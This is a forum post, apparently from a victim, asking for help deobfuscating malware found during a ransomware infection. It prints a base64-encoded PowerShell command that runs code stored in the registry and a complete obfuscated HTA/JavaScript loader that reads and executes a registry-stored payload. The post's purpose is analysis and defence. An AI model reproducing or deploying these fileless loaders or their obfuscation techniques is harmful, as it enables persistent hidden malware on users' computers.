Этот файл был обнаружен в зараженной системе.В системе обнаружена запись реестра, которая вызывает внешние вредоносные веб-сайты для отображения начала заражения вымогателями.Я пытаюсь расшифровать его, чтобы найти зараженный файл.Я считаю, что это услуга.
Я попытался декодировать часть кода HEX (\ x66) и тому подобное, но все идет в переменную, и похоже, что некоторые переменные команды меняют вход, еще больше маскируя, каким будет выход.Я не достаточно знаком с JS, чтобы знать, что происходит, но это действительно интересно.
Это был код BASE64 после вызова команды powershell из неизвестного источника моего поиска:
JAB7AHIAYABlAGcAfQA9ACcASABLAEwATQAnADsAJAB7AFIARQBnAHAAYABBAGAAVABoAH0APQAnADcAcwBQAEYAUAA3AEIANwBHAEYAJwA7ACQAewBSAGAAZQBnAGAAawBlAHkAbgBhAE0ARQB9AD0AJwB0ADMAVgBWAG4ATgB0ADcAZQBVACcAOwAkAHsAcABgAEEAUgBhAG0AfQA9ACcAbABJAE0AbgB0AEMAUwA4AGwATAAnADsAJAB7AEYAdQBMAGAAbAByAGAARQBHAH0APQAkAHsAcgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQAiAC0AZgAnAGYAWABMACcALAAnADoAZgAnACwAJwBTAG8AZgB0AHcAJwAsACcAWABMACcALAAnAGEAcgBlACcAKQApAC4AIgByAGAARQBwAGwAYABBAEMARQAiACgAKABbAEMASABBAFIAXQAxADAAMgArAFsAQwBIAEEAUgBdADgAOAArAFsAQwBIAEEAUgBdADcANgApACwAWwBTAHQAcgBJAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKwAkAHsAcgBgAEUARwBwAGAAQQBUAEgAfQA7ACQAewBFAGAAeABgAHAAUgBFAGAAcwBTAEkATwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBHACcALAAnAHIAbwBwACcALAAnAGUAcgB0AHkAJwAsACcAZQB0AC0ASQB0AGUAbQBQACcAKQAgACQAewBmAGAAVQBgAEwATAByAGUAZwB9ACkALgAkAHsAUABhAFIAYABBAE0AfQA7AC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAaQAnACwAJwBlAHgAJwApACgAJAB7AGUAWABgAHAAUgBlAHMAcwBgAGkAbwBOAH0AKQA=
После декодирования смутно показывает созданную запись реестра.
Это был файл в системе.Я добавил пробелы / LF для облегчения просмотра.
<HTA:APPLICATION ID="xAIAv5nyFFnT"
APPLICATIONNAME="qzEserCEK"
SCROLL="auto"
SINGLEINSTANCE="yes"
CAPTION="no"
BORDER="none"
SHOWINTASKBAR="no"
INNERBORDER="no"
WINDOWSTATE="minimize">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>tzEg1b54H</title><script>
jsibjKf9='HKLM\\Software\\Wow6432Node\\';
A41IZs4sH=jsibjKf9+'7sPFP7B7GF'+'\\'+'WVSMOZtXy8';
fVTKUU4Z='h'+'\x66'+'iei7'+['swY','iueh','U9Q'][1];
uAlUHoEI4='\x66';
mUrRZBlw=['hon','f','Ylz'][1];
PBMSNkV=uAlUHoEI4+mUrRZBlw;
sJpxcf4ckU=PBMSNkV+mUrRZBlw;
CAxiNPV=['dt9','q9','Ig98'][1]+['oT8N','JMk','bwkq','y7t6'][3]+sJpxcf4ckU;
bgWd1m='ds'+'b'+['LgE','A6nX','us','\x4e\x35\x63\x6a'][2]+CAxiNPV;
TvfsJFqm=['df','E_oB','JpG','Q21T'][0]+['jc3','UVF','vQUq','s'][3]+sJpxcf4ckU+'8'+'y'+'n'+'7';
fNpaIhi='\x64'+'f'+'\x68'+['7e','_DW','f_kE'][0]+bgWd1m+['fcP','QFt','hu'][2];
mq67_LC_Y=['ci5v','eh','Bv8'][1]+uAlUHoEI4+['wORH','GHpQ','qYsT','if'][3]+fNpaIhi+['uw','o6n','YqFF','eQTd'][0];
try{throw new Error(['qrau','zWt','hSs','.'][3]);
}
catch(x9y094wnx2)
{fVTKUU4Z=x9y094wnx2[['mAW','pAwK','nGD','mess'][3]+['qJM','age','bA_'][1]];
}
try
{throw new Error(['wcM5','EK4T','s','kwv6'][2]);
}
catch(MSFbXy)
{mUrRZBlw=MSFbXy[['mes','xto','qSY'][0]+['ZL1','N1b','sag'][2]+['ofr7','e','n94E','bfw'][1]];
}
try
{throw new Error('l');
}
catch(mo_NzYG)
{PBMSNkV=mo_NzYG[['yKAP','mess','Vx3Y'][1]+['age','\x6b\x33\x46','HstV','Sy2S'][0]];
}
try
{throw new Error(['zF62','c','Jwd','ILd'][1]);
}
catch(olcqTW)
{sJpxcf4ckU=olcqTW['\x6d'+'es'+['sag','ThL','ba8D'][0]+'e'];
}
try
{throw new Error('e');
}
catch(UCk3C3)
{uAlUHoEI4=UCk3C3[['lsiE','tEV','NpZQ','mess'][3]+['Gdg','MR0D','age'][2]];
}
try
{throw new Error('t');
}
catch(d8hyM21)
{CAxiNPV=d8hyM21['mess'+['ag','rrc','msGL'][0]+'e'];
}
try
{throw new Error(['i','idyq','s23J','\x77\x67\x38'][0]);
}
catch(FH2wspm)
{bgWd1m=FH2wspm['m'+'es'+['JXZc','\x73\x61\x67','rUs','fCW'][1]+['MAU','e','qM58'][1]];
}
try
{throw new Error(['Dwfy','v','IDK'][1]);
}
catch(nWUuLDh)
{TvfsJFqm=nWUuLDh[['pYF','\x6a\x73\x30\x4b','mes','wO2'][2]+['rNO9','giiJ','sage'][2]];
}
try
{throw new Error(['iy5Z','cE7','t'][2]);
}
catch(lJtpvPh9X)
{CAxiNPV=lJtpvPh9X[['me','NTrH','J4ju'][0]+'\x73\x73'+'a'+['XbGB','\x57\x72\x32','ge'][2]];
}
try
{throw new Error('\x53');
}
catch(hWWGLap){fNpaIhi=hWWGLap[['\x63\x39\x44\x43','xQk','mes','wM2c'][2]+['crOJ','bqZ','sag'][2]+['ngu','e','qjMR'][1]];
}
try
{throw new Error('\x52');
}
catch(WH4uWp9)
{mq67_LC_Y=WH4uWp9['\x6d\x65'+'ss'+'a'+'g'+'\x65'];
}
NWGvw4i=sJpxcf4ckU+'o'+['v2rO','\x6e','hye'][1]+mUrRZBlw+['Gbi','fxP','t'][2]+['l_Xf','fw54','r'][2]+['VMW1','UTu','u'][2]+sJpxcf4ckU+['t','BY9z','viM'][0]+'o'+['onm_','ZnJ','r'][2];
R18YNC6JjX=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV+['("','zQyX','RCL','Qi9'][0]+'X'+'Y1'+'J'+'_'+'\x77\x3d'+['eeQ','UYMS','Fi4','th'][3]+bgWd1m+mUrRZBlw+['\x5a\x66\x36','ykW',';
"','_of'][2]+')';
EQIJC3=['JJgq','PRb','Vlpy','W'][3]+fNpaIhi+sJpxcf4ckU+['r','\x57\x6c\x79','DWsl','df2'][0]+bgWd1m+['\x75\x36\x6b\x34','QW3','\x70\x74','\x77\x4f\x62\x4d'][2]+fVTKUU4Z+fNpaIhi+'\x68'+uAlUHoEI4+PBMSNkV+PBMSNkV;
dMVY8_=['jaqb','XDga','VJB1','A'][3]+sJpxcf4ckU+['vIr','YrFz','t','QoUm'][2]+bgWd1m+TvfsJFqm+uAlUHoEI4+['s16r','RuU','XObj'][2]+uAlUHoEI4+sJpxcf4ckU+'t';
xx3EjCVo31=mq67_LC_Y+uAlUHoEI4+['\x67','RQF','DXk','\x6c\x76\x64'][0]+mq67_LC_Y+uAlUHoEI4+['OmuP','ad','CCx'][1];
VLGRE1kdNk=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV;
B7EpHr=sJpxcf4ckU+PBMSNkV+['o','\x43\x78\x68','F9g'][0]+mUrRZBlw+uAlUHoEI4;
kR4Di8izVe=PBMSNkV+sJpxcf4ckU+CAxiNPV;
dBdlTCP=kR4Di8izVe[NWGvw4i][NWGvw4i];
_BoofMt4aj=dBdlTCP(R18YNC6JjX)();
try
{KMAswI3=new XY1J_w[dMVY8_](EQIJC3);
}
catch(_0UaAgblja)
{}
try{XY1J_w[VLGRE1kdNk](KMAswI3[xx3EjCVo31](A41IZs4sH));
}
catch(OmTqGis0dj)
{}
XY1J_w[B7EpHr]();
</script></head><body>
mvv7zDBzZULpDtQJ7JJkXKv5Wo2XP9vrVzzzycCz06nQGZEdFQXj_rbFLgwjIy
</body>